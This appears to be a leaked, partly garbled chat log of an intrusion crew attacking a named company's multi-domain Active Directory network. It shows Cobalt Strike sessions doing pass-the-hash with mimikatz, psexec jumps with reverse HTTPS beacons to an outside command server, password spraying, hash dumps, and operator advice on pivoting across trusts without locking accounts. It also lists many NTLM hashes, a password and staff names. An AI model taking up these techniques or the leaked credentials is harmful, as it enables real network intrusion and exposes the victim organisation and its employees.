see the folders - you can copy the dll and run it with wmik or something then I see no problem to do a pth and check `dir \\\datacenter.local\c$````
[+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\adm.brodan0:aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6' Administrator

[+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\svc.sccmcliinst:aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67' Administrator
Give me the results of the smb_login. How are the admins? Are they valid? Did I run them all in smb_login one at a time? Check the validity, just check the error number first. Did you check the smb_login? I guess that's not what's wrong?
beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214281 bytes
[+] received output:
Started service a7c3be0 on datacenter.local
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2

beacon> jump psexec64 datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (\datacenter.local\ADMIN$\1f2a452.exe)
[+] host called home, sent: 291406 bytes
[-] Could not start service 1f2a452 on datacenter.local: 225
``with the first jump not done ``datacenter.local DA:``
```
svc.sccmcliinst
aa9249f57aba289658fde8afe795fd67

adm.brodan0
06290576382001cd1da4c942e9fa0ca6
``@user8 you can also go through smblogin to open the domain from the domain you opened in the report too
the credentials are valid``.
beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214281 bytes
[+] received output:
Started service a7c3be0 on datacenter.local
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2
\DYA - admin's domainDYA - admin's domain, then do as he said? \pth "remote domain"\YA hash@user7 did you do what? with the domain or as LA? jump or smb_logs more than the ones you already checked then one more try, one, maximum 2 you tried less than 5 times in total on each one, right?
Lockout threshold: 10
what is the password policy in the current domain? and before that? these two have now tried one at a time on the jump, brute force does not run you can for the total number of fails and lock accounts how many brute force? i asked another question in smb_login? or rather i made a mistake and it for ALL domains the same and it is not necessary) so i as a search, there is 1 part of the hash from the wrong domain how much has tried?did not try 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so i asked[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so you had 10 admins there? ok a session in the slip, so if anything there drop a session on a distant server did you do through pth the same? and then there came hashes above? dunne 0/2dozhennye all jumped others?
beacon> pth datacenter.local\adm.barsmr0 fabb67c5be20e99698dbc77e751afb3f
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.barsmr0 /domain:datacenter.local /ntlm:fabb67c5be20e99698dbc77e751afb3f /run:"%COMSPEC% /c echo d19dee36172 > \.\pipe\eb999d" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : adm.barsmr0
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d19dee36172 > \.\pipe\eb999d
impers. : no
NTLM : fabb67c5be20e99698dbc77e751afb3f
  | PID 836
  | TID 1784
  | LSA Process is now R/W
  | LUID 0 ; 1753376140 (00000000:6882658c)
  \_ msv1_0 - data copy @ 000000EAA17DC2B0 : OK !
  \_ kerberos - data copy @ 000000EABD39BA68
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000000EAA17D1D98 (16) -> null

beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214268 bytes
[-] Could not open service control manager on datacenter.local: 5
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 1909
```

```
beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth datacenter.local\adm.taydav1 24aa312899f051fbc1a5b464de82c802
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.taydav1 /domain:datacenter.local /ntlm:24aa312899f051fbc1a5b464de82c802 /run:"%COMSPEC% /c echo 3a6015fae67 > \.\pipe\9f382d" command
[+] host called home, sent: 31 bytes
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 653145 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53
[+] received output:
user : adm.taydav1
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo 3a6015fae67 > \.\pipe\9f382d
impers. : no
NTLM : 24aa312899f051fbc1a5b464de82c802
  | PID 6972
  | TID 6260
  | LSA Process is now R/W
  | LUID 0 ; 1752989744 (00000000:687c8030)
  \_ msv1_0 - data copy @ 000000EAA17DD480 : OK !
  \kerberos - data copy @ 000000EABD39BD78
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000000EAA18BC2F8 (16) -> null
``From the 3rd trust there are no common adminsWhy with my number of LA hash only on ``
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

``search for >infoad_users? also the field in the dump ADinfo it? there LA sometimes leave creeds in the description can also look in ad_computers in info also empty? but it doesn't have to be)))) and descriptors from the same place I looked not from the datacenter, but from the primary domain :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:that's what's above,kzzzzzznm```

beacon> shell adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt
[*] Tasked beacon to run: adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt
[+] host called home, sent: 122 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [AUSYDHC-ESP-DC1.legalco.local] Error 0xa (10) - Referral

``````
 >description: Owner: Ludwina Kleiss (REQ0109502)
>sAMAccountName: conveyancing
>memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
```
```
>description: AMS Contractor (obsolete?)
>cn: Robert Hair
"samaccountname" and "memberof" no
dn:CN=Robert Hair,OU=Contacts,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: REQ0326018 Expiration date:�21/07/2020 (US00021RAP)
>sAMAccountName: shayog0
"memberof" no
dn:CN=Yogesh Sharma,OU=Contractor,OU=Alpharetta,OU=Users,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: REQ0341109 Expiration date:14/10/2020 (US00040RAP)
>sAMAccountName: mokmil0
>memberOf: CN=SG-GLOBAL-Horizon-QA Salesforce,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-AMER-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-Horizon-POOL4,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-EMEA-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Intune,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Pulse Secure VPN,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Dropbox Users,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Jira_Cloud-Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Confluence_Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-MFA Okta Verify,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SAIG - OneDrive User Policy,OU=APAC,OU=VDI,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-M365 License-Standard,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=DL-STANDARDS-APPSENG-APAC Digital CI Team,OU=Groups - Distribution,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Jira_Cloud-User,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-0365 Core Applications,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-OKTA-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-WPFB-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Americas-Citrix-Remote-PC,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-SP_Hexaware,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-Citrix-W8VDI_120GB,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Security Training,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Tosca_User-Prod,OU=SCCM 2012,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-MFA_Gateway,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Confluence_User-Prod,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-WSG-General Internet Access,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-FPS-Developers,OU=Groups - Security,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=DL-REG_APAC,OU=Distribution Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: WebSense manager (copwsg05) service account
>sAMAccountName: svc.websense
"memberof" no
dn:CN=Websense Service,OU=AsiaPac,OU=~Service Accounts,DC=saig,DC=frd,DC=global
```
```
>description: Used for N-Cenral Scanning (CHG0045156)
>sAMAccountName: svc.ncentral
>memberOf: CN=SAIG Corporate IT SCCM Read Only,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=APAC vCenter ReadOnly,OU=~ Admin Groups - Restricted Access,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-AMER-VCENTER-Read Only,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=Domain Admins,CN=Users,DC=saig,DC=frd,DC=global
``it's just a matter of selecting and scrolling
or by
pass
passw
passwd
pass :and each one has a description? scroll down and read everything? so if it's like 3k+ users or whatever)or via -it can be listed in ()I have nothing like pwd, password, pass in the description by the way, and if all these trusts are removed - have you looked at the description and info fields ``?
saiglobal.com\adm.barsmr0 aad3b435b51404eeaad3b435b51404ee:fabb67c5be20e99698dbc77e751afb3f
saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6
saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802
saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0
saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e
saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac
saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9
saiglobal.com\adm.kinzac1 aad3b435b51404eeaad3b435b51404ee:52ab4557416b5fd8dfeed6e329db05fb
saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67
saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802
saig.frd.global\svc.msmap aad3b435b51404eeaad3b435b51404ee:c54366d3aa3826eea0441de8d24a97ee
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67
saig.frd.global\svc-apac-ems-search aad3b435b51404eeaad3b435b51404ee:3f42b326ea1826890f7bb977474083dc
```s`svc.sccmcliinst I mean jumpscropped by sqladmin once try it once it's ok but the first part is for 1 domain you need both parts of the hash and you can't check it with the smloginommne 11
```
    0: 80-20 80-20.com (Direct Outbound)
    1: LEADERS leaders.frd.global
    2: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    3: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    4: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    5: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    7: C360 c360.local (Direct Outbound) (Direct Inbound)
    8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    9: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 5) (Primary Domain) (Native)
``1 trastpochom thing? everything is fresh, hit the ntlm is fresh? ntlm is fresh, the main thing is not to block i can't jump to any ntlm now, or smb login check for jump ntlm is fresh?
sqladmin
svc.msmap
svc-apac-ems-search
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=q5J9aMTqwWPPZ5TST) I've got some dudes here that don't match me and _*user7* even if you do a ctrl+f in the browser everything matches except sqladmin which doesn't ``
adm.matdmy0
adm.barsmr0
svc.sccmcliinst
adm.brodan0
svc-amer-ems-search
adm.kinzac0
adm.kinzac1
adm.kalnic0
adm.evamar1
adm.turime0
adm.bisfra0
adm.brodav1
adm.taydav1
adm.macpet0
svc.sccmcliinst
sqladmin
svc.sccmcliinst
svc-apac-ems-search
``Successful pings of datacenter.local servers
sqladmin
svc.sccmcliinst
svc-apac-ems-search
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=KeGz5iQb34qy3GSJQ) remove the intersections between these and I'll take a look at ``
adm.barsmr0 adm.taydav1
adm.brodan0 sqladmin
adm.taydav1 svc.msmap
adm.bisfra0 svc.sccmcliinst
adm.brodav1 svc-apac-ems-search
adm.kinzac0
adm.evamar1
adm.kalnic0
adm.kinzac1
adm.turime0
svc.sccmcliinst
```
any crack on them ? ``don't block them try to ping unreachable ones through that trust ? or try LA, DA, EA go to other accessible? how many domains did you get into ``portscan %.%.0/24 445 icmp 1024``?
i pinged the servers on a "remote" machine from a car i own
```
i'm sorry, i don't understand, you pinged the servers in the remote domain? not the one you're in now, right? i'm pinginging the subnetwork now, i don't have access to the pdk as i understand
i pinged the servers on the "remote" machine from the car which i have critical only if the hostname notound - this means that there is no associated link between the hostname DNS and the actual car - usually it is the "abandoned" entries where the loss - it means no visibility of the host or it is disabled, often pings can be filtered simply iron and these same hosts will ping normally from another place pings do not need to disassemble to 0% Loss and 100% Loss?I'm aware of that, you can export - there is an export if it's more convenient for you.
how do you dump a hash dump into a file
```
hashdump results are saved in cobalt in credentials and you can select the needed hashdumps and copy them to your clipboard
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:16:29> shell nltest /dclist:c360.local
[*] Tasked beacon to run: nltest /dclist:c360.local
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'c360.local' from '\\AUHDC1-C360-DC1.c360.local'.
    AUHDC1-C360-DC1.c360.local [PDC] [DS] Site: AUHDC1-2
    AUHDC1-C360-DC2.c360.local' [DS] Site: AUHDC1-2
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:17:47> shell nltest /dclist:SaigProd.local
[*] Tasked beacon to run: nltest /dclist:SaigProd.local
[+] host called home, sent: 60 bytes
[+] received output:
Get list of DCs in domain 'SaigProd.local' from '\\AUSYDHC-SPPDC03.SaigProd.local'.
    AUSYDHC-SPPDC03.SaigProd.local [DS] Site: Default-First-Site-Name
     AUHDC1-SPPDC02.SaigProd.local [PDC] [DS] Site: Default-First-Site-Name
     AUHDC1-SPPDC01.SaigProd.local [DS] Site: Default-First-Site-Name
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:18:35> shell nltest /dclist:standards.com.au
[*] Tasked beacon to run: nltest /dclist:standards.com.au
[+] host called home, sent: 62 bytes
[+] received output:
Get list of DCs in domain 'standards.com.au' from '\\ausydhc-austdc1.standards.com.au'.
          sydcpdc00.standards.com.au [PDC] [DS] Site: SYD
    ausydhc-austdc1.standards.com.au [DS] Site: SYD
The command completed successfully

``How you can put a hash dump into the file to tell you the truth I do not know how except ntlest exactly primal domain controller to allocate, but usually LA on different DCs coincide and even control over RODC will advance us enough in the dumps
from the server axis
adm.barsmr0 adm.taydav1
adm.brodan0 sqladmin
adm.taydav1 svc.msmap
adm.bisfra0 svc.sccmcliinst
adm.brodav1 svc-apac-ems-search
adm.kinzac0
adm.evamar1
adm.kalnic0
adm.kinzac1
adm.turime0
svc.sccmcliinst
```
have their creeds ?yesVerely[ ](https://mediaeveryone.com/group/saiglobal-com?msg=xAvwuKGMPvPyZvton) yes:zany_face:
```
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.barsmr0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc.sccmcliinst:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodan0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc-amer-ems-search:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kalnic0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.evamar1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.bisfra0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.taydav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.macpet0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.matdmy0:Delta2021$',

[*] 10.225.10.201:445 - Scanned 1 of 1 hosts (100% complete)
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator msxservice
The command completed successfully.


``see the collisions with the current users from DA with the LA list that @user3 you have what EAs in the domain? i.e. @user3 logged in under the DA token from the trusted domain, which turned out to be LA in thismobilize who is in LA```
SAIG\Domain Admins
```Did the LA set from the MAC? What's with the pdk?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=h4FQbM7kNW47PhDSY) @user3oh there's a set of LAs right there``
beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
adminstaff
AndrewB
arcserve
AVinstall
AW1.Service
BN.Service
CA - ArcServe
caroot
caunint
CR.Service
Damien
DB.Service
Domain Admins
Enterprise Admins
FL.Service
FS-Tank
Intranet-Service
JF.Service
JH.Service
JonathanH
martin.carlisle
mj.service
MR.Service
msxservice
Nathan.harper
SAI.service
saig.datacentre
SAIG\Domain Admins
ServiceController
SN.Service
ST.Service
SzeWing.Austen
WA.Service
Wendy.Glasgow
WM.Service
The command completed successfully.

Why did I increase the size of the chat messages? So that you could throw archives? From the pdk?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vyqLkKF5NaEZ8SQfR) I did not work under tokin@user3 send me the information I asked plz with the "remote" domain with the domain? And tell me the local admins on the dk in your domain and from which token was 1 attempt at each user should not come to try to smb login
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 21:52:50> shell net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[*] Tasked beacon to run: net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[+] host called home, sent: 94 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

```
My passssmb_login didn't match either, thenDid it under token from the first time. There are a lot of users and a lot of local admins in the Domain. Dot no vershel also.can check on this password other accounts domain admins with authorization through domain trastanu in general yes, the answer we got anyway, the pass does not match `` ``.
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

``dadatacenter.local is that right there hostname in another domain?
beacon> shell net use \\\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[*] Tasked beacon to run: net use \\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

``Try a different domain at once with no jumps no yuztak it is automatically made in the jumpsa it was a token, and you need no yuz)``
beacon> make_token saig.frd.global\adm.turime0 Delta2021$

``This was a jumper, especially when there is a cleartext creeda the usual net cses better not check such things with a token, I try the last cser with a different domain is with the current domain
beacon> rev2self
[*] Tasked beacon to revert
beacon> make_token saig.frd.global\adm.turime0 Delta2021$
[*] Tasked beacon to create a token for saig.frd.global\adm.turime0
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 214335 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53
``and then also check @tl2c360.local [10.195.43.2]ooo it's just my one trust shared, I've already reshot the hashes, this is a fresh ``Password last set 28/09/2020 9:43:00 AM`1 only(``
adm.turime0:Delta2021$
``and the password is possible? and the answer will come by itself = )
this is more of a logical than a technical problem, i.e. you can also consult logic and roughly estimate what is a service that can be connected to other domains and what "unlikely"
read the descriptions of critical servers, look more closely to the very composition of the AD, in a group logic is simple, administrators do not multiply the services in each domain, saving resources and using the services of the "forest"
the second option will be critical MSSQL servers - when you need to exchange data between quarantine and login (for example, some RDBMS aimed at ERP/CRM system)
eExchange and similar typical trust "cross-points" are WSUS / SCCM and other "forest" services
they most often see quarantined segments because they have an interface there and can be represented there, I recommend checking authorization logs on such servers (sitbelt can do this) and so you can find other users from the trusts in the logs (i will look what is there then? but you will know that the pass from this account in two domains is different and so you will have 2 login errors which will not block an account in another domain) with EA similarly as example
```
net use \\datacenter.local\c$ P@ssword /user:saig.frd.global\adm.brodav1
||
net use \\datacenter.local\c$ P@ssword /user:datacenter.local\adm.brodav1
So, there are 2 possible developments, either the current admin will be valid WITH the CURRENT domain or WITH the ACCEPTED one
saig.frd.global
и
datacenter.local
```

``Congruent YES:``
```
adm.matdmy0
adm.barsmr0
svc.sccmcliinst
adm.brodan0
svc-amer-ems-search
adm.kinzac0
adm.kinzac1
adm.kalnic0
adm.evamar1
adm.turime0
adm.bisfra0
adm.brodav1
adm.taydav1
adm.macpet0
```

``Congruent EA:``
```
adm.matdmy0
``We're interested in file storage, backups, edr, virtualization systemsfind adminsAre we interested?
```
SolarWinds.MSP.RpcServerService.exe
These 2 will have to be searched on WSUS servers
Ping request could not find host Anstat.local. Please check the name and try again.
Ping request could not find host leaders.frd.global. Please check the name and try again.
``c360.local [10.195.43.2]
SaigProd.local [10.195.100.1]
standards.com.au [10.195.25.234]
removed ad info and YES and general YES from saig.frd.global`datacenter.local [10.225.10.201]` - removed:
ADinfo
DA
EA
WinServsk by the way from adjacent domains check the ping not availableAUSYD1-COPADS02.saig.frd.global - 10.200.25.149 (shot hell) get into them dump and td here names and ipso from those 5 visible received ip and he pinged okay, let's what is that on the hostname is not pinged, checked the 445 port) selectively? like out of 254 addresses chose 5 random?) on /24 not scanned, only selectively trasts if he does not see dk, does not mean that does not see anything else? sabnet /24 scanned at this domain to 139,445? another thing packet loss 100[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bujgw683YEBYo4Zjd)?that no access from this point is not pinged what does it mean? and from the others? well, yes))) not pinged from the current point?) and half not pinged, about 5 workers) 14 domains, how many done?you have 19 pcs - 5 quarantines with normal trusts sort it out for now leave the karanin domains I do not think that the commands above crashed winlogon did not pay attention when I jumped into winlogon, I think there was nothing what is winlogon? there are two, I missedwinlogon? from what context was the system? or there are 2? or I do not understand it)
80-20 80-20.com
```
is that a whole name? took the trusts from the server where I was, I wanted to ping
syntax is wrong but that's not the point, it didn't even work and the session crashed out of the trusts
```
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``domain_trust80-20 80-20.com what are the targets? It didn't even start.
portscan 80-20 80-20.com 445 icmp 1024
``````
Use: portscan [targets] [ports] [arp|icmp|none] [max connections]
``Jumped over and the session crashed
entire log
What could it be for?
```
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: 80-20 80-20.com (Direct Outbound) (Direct Inbound)
    1: LEADERS leaders.frd.global
    2: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    3: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    4: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    6: C360 c360.local (Direct Outbound) (Direct Inbound)
    7: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    8: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    9: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 4) (Primary Domain) (Native)

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
saig.frd.global
beacon> shell nslookup 80-20 80-20.com
[*] Tasked beacon to run: nslookup 80-20 80-20.com
[+] host called home, sent: 55 bytes
[+] received output:
*** Request to UnKnown timed-out

DNS request timed out.
    timeout was 2 seconds.
Server: UnKnown
Address: 52.58.78.16

DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.

beacon> portscan 80-20 80-20.com 445 icmp 1024
[-] portscan error: Invalid port or range '80-20.com'
beacon> shell ping 80-20 80-20.com -n 1
[*] Tasked beacon to run: ping 80-20 80-20.com -n 1
[+] host called home, sent: 56 bytes
[+] received output:
Ping request could not find host 80-20. Please check the name and try again.

beacon> shell ping LEADERS leaders.frd.global -n 1
[*] Tasked beacon to run: ping LEADERS leaders.frd.global -n 1
